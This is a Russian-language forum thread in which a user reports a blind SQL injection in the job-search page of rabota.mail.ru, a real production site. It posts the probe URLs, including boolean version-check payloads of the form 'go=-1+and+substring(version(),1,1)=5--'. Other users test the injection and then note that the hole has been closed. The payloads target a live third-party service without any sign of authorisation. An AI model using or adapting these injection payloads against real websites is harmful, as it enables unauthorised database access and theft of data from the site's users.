|
баг на mail.ru
Вот нашол SQL injection на mail.ru
Crekm слепая, без вывода... внимательно смотрим на формировку наги: Код:
http://rabota.mail.ru/vac_search/?go=1&from_search=1&query=Код:
http://rabota.mail.ru/vac_search/?go=1'&from_search=1&query=Код:
http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=вроди как возможно внедрение SQL кода... Дальше не докрутил, ибо не силён в подзапросах... |
Не знаю, какая там 5-ая...
У меня страница Код:
http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=Код:
http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=4--&from_search=1&query=А вот так: Код:
http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=3--&from_search=1&query= |
у меня новости меняются.
|
да и не в версии дело, бага то есть...
|
Ну, в случае с маилом, уже не особо удивляет блинд скуля.. Учитывая, что недавно была инъекция с выводом ^^
|
прикрыли о_О
|
Ну да, я cразу зашёл и прикрыл ^^
|
да правда прикрыли!
|
Я это багу нашол недели 3 назад...
|
Смысл ложить такое в паблик =\
|
| Время: 12:39 |